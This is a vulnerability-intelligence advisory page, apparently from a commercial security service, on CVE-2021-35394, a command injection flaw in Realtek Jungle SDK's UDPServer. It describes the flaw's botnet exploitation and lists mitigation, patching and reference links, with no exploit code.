CriticalCISA KEVExploited in the wildPublic exploit

Realtek Jungle SDK UDPServer Remote Command Injection RCE

IdentifiersCVE-2021-35394CWE-78· Improper Neutralization of Special…

CVE-2021-35394 affects the Realtek Jungle SDK diagnostic component known as MP Daemon, typically compiled as the UDPServer binary, in versions 2.x through 3.4.14B. According to the provided content, UDPServer is exposed as a network-reachable service and is affected by multiple memory corruption issues as well as an arbitrary command injection vulnerability. The vulnerability can be exploited remotely and without authentication, allowing an attacker to send crafted input to UDPServer and trigger arbitrary command execution on affected devices. Because the Jungle SDK is embedded across a large downstream IoT supply chain, the issue impacts numerous products derived from the SDK, including routers and other embedded devices from many vendors.

For your environment

Are you exposed to this one?

Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.

Start free trial

ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

Successful exploitation allows remote unauthenticated attackers to execute arbitrary system commands on affected devices and effectively take over the target. Observed post-exploitation activity in the provided content includes downloading and executing malware, writing and launching binaries directly on the device, enrolling devices into botnets such as Mirai, Gafgyt, Mozi, and RedGoBot, and issuing reboot commands to cause denial of service. In practice, this can result in full compromise of the device, botnet recruitment, DDoS capability, service disruption, and use of the device as infrastructure for further attacks.

Mitigation

If you can’t patch tonight, do this now.

Until patches can be applied, restrict or block access to UDPServer, especially exposure of the service on UDP port 9034, from untrusted networks and the public internet. Use network segmentation and ACLs/firewall rules to limit reachability to trusted management hosts only. Monitor for anomalous inbound traffic and exploit attempts targeting UDPServer, as well as suspicious outbound callbacks, malware downloads, or unexpected reboots. If a device is believed to be compromised, isolate it from the network, factory reset it, reinstall trusted firmware, and reintroduce it only after validation.

Remediation

Patch, then assume compromise.

Upgrade or apply vendor firmware updates that address CVE-2021-35394 in Realtek Jungle SDK-derived products. Because the vulnerable component is embedded in downstream OEM/ODM devices, remediation generally requires obtaining and installing patched firmware from the device manufacturer rather than from Realtek directly. The provided content indicates affected versions are up to 3.4.14B, so devices running those vulnerable builds should be updated to a fixed release supplied by the vendor. If compromise is suspected, perform a factory reset and reinstall firmware as recommended in the provided reporting, then rotate any relevant credentials and validate that no unauthorized services or persistence mechanisms remain.

PUBLIC EXPLOITS

Exploits

No public exploits tracked yet. Mallory keeps watching.

VALID 0 / 0 TOTALView more in app

No public exploit code observed for this vulnerability.

EXPOSURE SURFACE

Affected products & vendors

Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.

VendorProductType

RealtekJungle Sdkapplication

RealtekRtl819x Jungle Software Development Kitapplication

Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.

ACTIVITY FEED

Recent activity

4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

4 SOURCESView more in app

the hacker newsNews

Jan 8, 2025

Mirai Botnet Variant Exploits Four-Faith Router Vulnerability for DDoS Attacks

A security vulnerability exploited by Mirai botnet variants to compromise devices and expand botnet reach.

palo alto networks unit 42 blogNews

Jan 24, 2023

Realtek SDK Vulnerability Attacks Highlight IoT Supply Chain Threats

A remote, unauthenticated command execution vulnerability in Realtek Jungle SDK (UDPServer component) that enables device takeover at scale across many downstream IoT products that embed affected Realtek chipsets/SDK versions.

qianxin xlab blogNews

Jan 10, 2026

Gayfemboy: A Botnet Deliver Through a Four-Faith Industrial Router 0-day Exploit.

A named CVE used by the Gayfemboy botnet as part of its exploitation toolkit.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets are affected, which adversaries are exploiting it right now, which detections to deploy, and what to do tonight.

Start free trial

Exposure mapping

Query your assets running an affected version, and investigate the blast radius.

Threat actor evidence

Every observed campaign linking this CVE to a named adversary.

Associated malware6

Malware families riding this exploit, with evidence and IOCs.

Detection signatures1

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Vendor-by-vendor mapping

Cross-references every affected SKU, including bundled OEM variants.

Social activity1

Community discussion across Reddit, Mastodon, and other social sources.

EXTERNAL REFERENCES

MITRE CVE

cve.org · CVE-2021-35394

NVD

nvd.nist.gov/vuln/detail/CVE-2021-35394

MITRE CWE · CWE-78

Improper Neutralization of Special Elements…

Patch

realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf

US Government Resource

cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-35394